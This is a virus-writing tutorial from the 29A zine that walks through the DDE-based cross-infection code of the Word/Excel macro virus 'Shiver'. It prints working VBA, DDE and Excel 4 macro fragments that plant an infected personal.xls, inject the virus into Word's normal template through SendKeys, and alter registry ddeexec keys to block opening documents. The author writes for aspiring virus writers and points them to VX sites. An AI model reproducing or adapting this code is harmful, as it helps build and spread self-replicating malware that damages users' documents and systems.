Copy Link
Add to Bookmark
Report
29A Issue 03 02 08
Cross Infection Tutorial for Office'97 PART II
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ>
VicodinES
An analysis of the cross application macro virus, Shiver, and the use of
DDE.
Shiver was written by a good friend of mine who goes by the handle ALT-F11.
ALT-F11 is part of the a new virus group, The Alternative Virus Mafia. It
is with his permission that I write this and that 29A publishes his source.
Macro viruses are very low-tech. Anything too complicated can cause notice-
able slow downs and obvious infection delays. By using DDE Shiver attempts
to use some of the more advanced Office functions to its advantage.
DDE stands for Dynamic Data Exchange. It is the mechanism by which Office
applications share data and exert limited control over one another. Being
that VBA commands are almost identical in Word and Excel you would think
that DDE commands would likewise be nearly identical. This however is not
the case. Things that you can do to and from Word are not the same things
that you can do to and from Excel.
Lets go over some DDE basics before I analyze the way that Shiver uses it.
Before you can start any DDE communication you need to initialize a chan-
nel. The way this is done is to set a variable to Application.DDEInitiate
and Windows will return a free DDE communication channel number (the first
free one). This is the channel, or pipe, that you will reference until you
close it.
CNL = Application.DDEInitiate("Excel", "system")
I use the variable CNL as the channel number. CNL will be set to the first
free open channel to Excel ... if no other DDE is active the channel number
will most likely be 1. This example opens up a channel of communication
between Word and Excel. The communication is between the two applications
and not with any open spreadsheets or workbooks. The "system" specification
says that any commands you are going to send down the open DDE pipe are Ex-
cel system specific. On the other hand if you were going to send commands
to a sheet named "Sheet1" you would need to open an object specific chan-
nel:
CNL = Application.DDEInitiate("Excel", "Sheet1")
or open one with Word "system":
CNL = Application.DDEInitiate("MSWord", "system")
Ok that's how to open a channel of communication. What to do next? Well
that all depends on your goal. I'll start to analyze Shiver here and we
will establish that the goal of Shiver at this point is to cross infect
from Word to Excel. All the following DDE code is Word specific.
Once Shiver has infected Word on the first AutoClose it will check the reg-
istry to see if it has cross infected Excel.
It checks: HKEY_CURRENT_USER\Software\VB and VBA Program Settings\Office\
8.0\Shiver[DDE]
if the value does not equal "ALT-F11" (or does not exist) then Shiver next
looks to see if Excel is running. Shiver will not attempt cross infection
if Excel is running. VBA does not contain native code to allow you to check
for active applications (Word Basic did have IsAppActive but VBA does not
have this function). You can scan the "tasks" but "task" scanning can't be
done from Excel so to keep things even Shiver uses the FindWindowA API and
looks to see if the main Excel window is open. [see the Shiver source for
API call and window handle]
Ok Excel isn't running and hasn't been infected so Shiver next does this:
Shell (Application.Path + "\Excel.exe"), vbMinimizedFocus
Application.DDETerminateAll
CNL = Application.DDEInitiate("Excel", "system")
Application.DDEExecute CNL, "[New(4)]"
Application.DDETerminate CNL
It opens Excel in a minimized window with focus. Shiver then terminates any
and all other DDE channels just to be safe and to make sure there is a free
channel. It then initiates a pipe of communication with Excel "system".
Then it sends it's first DDE command.
Do you know what a Excel Formula virus is? An Excel formula virus is a
Excel virus that is written in Excel 4 macros - they are not really form-
ulas but the AV's have been using that term. There are currently only two
XF viruses in existence. Paix and Classic (aka Sic). I have never seen the
code from Paix but I wrote Classic so I know a thing or two about Excel 4
macros. They are quite powerful but somewhat limited.
Why did I just tell you about Excel 4 macro viruses? Because any and all
le gal Excel 4 macro commands can be sent down a DDE pipe to Excel!! Very
very important to know!
The first command Shiver sends to Excel "system" is New(4) - which is the
Excel 4 macro command to add a new Excel 4 macro sheet. To execute a com-
mand via DDE you need to use DDEExecute. Shiver then terminates that chan-
nel.
So a quick recap - Shiver looked and saw Excel wasn't infected so it start-
ed Excel minimized, opened a DDE pipe, sent a command to add a new Excel 4
macro sheet and then closed the channel. That leaves us in our current
state - Excel and Word both opened, Word in control and Excel minimized
with a new macro sheet.
What next?
CNL = Application.DDEInitiate("Excel", "Macro1")
Application.DDEPoke CNL, Item:="R1C1", Data:="=VBA.INSERT.FILE(""c:\shiv
er.sys"")"
Application.DDEPoke CNL, Item:="R2C1", Data:="=SAVE.AS(""" & Application
.Path & "\xlstart\personal.xls"")"
Application.DDEPoke CNL, Item:="R3C1", Data:="=Return()"
DDEExecute channel:=CNL, Command:="[Run(""R1C1"")]"
Application.DDETerminate CNL
Shiver then opens a new DDE channel with Excel to the new Excel 4 macro
sheet "Macro1" (the default macro sheet name). Now Shiver does not execute
any command but sends the macro sheet data. To do this you use the DDEPoke
command. What Shiver is doing is creating a virus loader in the Excel 4 ma-
cro sheet. In Row 1 Column 1 (R1C1) of that sheet Shiver puts the "import
command". In R2C1 it adds the "save as" command (the xlstart directory and
the default personal.xls file name). It then adds in R3C1 the return()
which is needed at the end of all Excel 4 macros. Excel macros are run from
top to bottom and end when the "return()" is reached.
So there is now a virus module loader in the new macro sheet. Shiver then
runs Row 1 Column 1 (the start of the loader macro). This will load "c:\sh-
iver.sys" which the Word part of Shiver previously exported since both
parts of Shiver (Word and Excel) use the exact same .bas file.
Once that is run Excel is 100% infected on next run because there is an in-
fected personal.xls in the xlstart directory. The only problem now is that
Excel is still running so Shiver must close Excel via DDE.
CNL = Application.DDEInitiate("Excel", "system")
Application.DDEExecute CNL, "[RUN(""Personal.xls!PXL_Done"")]"
Application.DDETerminate CNL
Since Shiver just imported our macro code into a personal.xls it is cur-
rently the active workbook in Excel which is still running. Shiver then
runs the macro PXL_Done in personal.xls. PXL_Done contains this code:
Sub PXL_Done()
ActiveWindow.Visible = False
Workbooks("personal.xls").Save
Application.Quit
End Sub
What it does is simple. It hides the personal.xls workbook then saves it
(personal.xls is considered "dirty" (changed) because Shiver set it hidden
so it has to be saved again). Then Excel is closed. Shiver just achieved
cross infection from Word to Excel with DDE. It opened Excel, added a new
macro sheet. wrote a virus loader into that macro sheet, ran the loader
which imported the virus code, saved the workbook, set it hidden and then
exited Excel!! Nice!
Things to note before we go on: All DDEExecute commands are Excel 4 macro
commands also, you must terminate your DDE channels when you are done with
them!
Now lets turn the tables. Excel is infected and Word is clean. How can Shi-
ver jump to Word? Can it add a macro sheet? Yes it can - you can add a new
module but you can NOT DDEPoke data too it! So Shiver can't use the same
method to go from Excel to Word. How does Shiver do it?
It runs the same registry check and check to see if Word is running. Then
it....
Shell Application.Path & "\winword.exe", vbMinimizedFocus
CNL = Application.DDEInitiate("MSWord", "system")
Application.DDEExecute CNL, "[fileclose]"
Application.DDEExecute CNL, "[Sendkeys ""%{F11}""]"
Application.DDEExecute CNL, "[Sendkeys ""^m""]"
Call delay
SendKeys "c:\shiver.sys", Wait
SendKeys "%o"
Application.DDEExecute CNL, "[Sendkeys ""%{F4}""]"
Application.DDEExecute CNL, "[Sendkeys ""%{F4}""]"
Application.DDEExecute CNL, "[Sendkeys ""y""]"
Application.DDETerminate CNL
What is that? Doesn't look anything like the way it infected Word does it?
I'll take it step by step.
First Shiver opens Word minimized with focus. Then it initializes a channel
of communication with Word "system". Shiver then sends the FileClose com-
mand. This is done to close the default document that opens when you start
up Word (you will see why soon). Shiver then opens up the Visual Basic Ed-
itor (VBE) with the SendKeys command %{F11} (alt-f11). At this point Word
comes out of its minimized state. This is noticeable but unavoidable. The
sendkeys here is a bit misleading - you are not just doing a SendKeys
(sending keystrokes) to Word. Using DDE you are controlling Word and the
keystrokes are coming from within Word - very important - this would not
work by just doing a SendKeys from Excel. Next the command ctrl-m is sent.
Ctrl-m is the shortcut keystroke within the VBE that brings up the "Import
File" dialog box. Shiver then runs a delay routine to ensure that the dia-
log box is ready for input. Once the delay is over it sends FROM EXCEL
(basic SendKeys now) "c:\shiver.sys" into the Import File dialog box and %o
(alt-o for Open).
At this point Shiver has just imported shiver.sys into the Word VBE. Shiver
was able to import it directly into the normal template because it prev-
iously closed the default open document. This is important because this
makes it that Word is infected and not just some open document.
After infection it's time to get out and save. Shiver sends alt-f4 to close
the VBE, than another alt-f4 to close word and finally sends "y" to answer
the question "do you want to save changes to the normal template. The ans-
wer has to be yes because Shiver just changed the normal template by in-
fecting it.
An overview:
Shiver is two fully functional macro viruses - one for Word and one for Ex-
cel that share some subroutines and one VBA module. It has the ability to
cross infect without error. It utilizes the registry for cross infection
self-recognition. In the world of simple macro viruses this is one of the
more complex bugs. I did not cover all it's features but concentrated on
its DDE functionality. If you want to see what else it does check out the
source.
More DDE info:
In the registry DDE is used all over the place. Many times you will see
keys
...\shell\open\ddeexec\[FileOpen("%1")]
this is what explorer uses when it opens a file via a "double click". File-
Open "filename" - which is the value passed to %1 just like in batch files.
One version of Shiver changed this in the Word.8 section from [FileOpen("%1
")] to [FileClose("%1")] - this little change made it so that no doc files
could be opened from explorer with a "double click". There are also Auto-
Exec keys that can be utilized. They can be set to open or run anything on
FileOpen (many of the "free" macro virus protection packages use this.
Can I offer you any other examples of what can be done with DDE?
Look Software came out with Virus ALERT for Macros (Office 97 Edition) when
Office 97 first came out. Their product added this to the registry:
to the key "HKEY_CLASSES_ROOT\Word.Document.8\shell\Open\ddeexec"
they add "[VAFileOpen.VADDEOpen("%1")]"
that runs their sub VADDEOpen on a "double click"
You can still find this product for free on the web - it's about worthless
now as an AV product but I would suggest anyone interested download a copy
and pull the source out with HMVS. There are some great examples of REAL
VBA DDE code and even good non-DDE code in there. It's one of the few "free
macro AV" products I've seen on the web that isn't an upconverted WordBasic
template. Their product contains lots of code that translates to VBA macro
viruses quite well. There is some crc self recognition code in there that
you might find useful also.
Also if you plan to explore DDE functionality from within Word or Excel get
a copy of the Excel 4 macro commands either from a VX site or from the
Microsoft website. That will give you an idea of what you can use via DDE
and with DDE in the registry (you'll be surprised at your options).
For an example of a Excel 4 macro virus you can find my XF.Classic.Poppy at
most VX sites - I included the code in an exposed sheet.
peace,
VicodinES
On a personal note - if anyone is interested in my current status. I have
retired from writing viruses but did not fall off the face of the Earth. I
will continue to write tutorials, help new viruses writers and if I get a
really good idea - well then I may come out of retirement. In the immediate
future I will be writing a VB Script virus. tutorial (for CB5?)
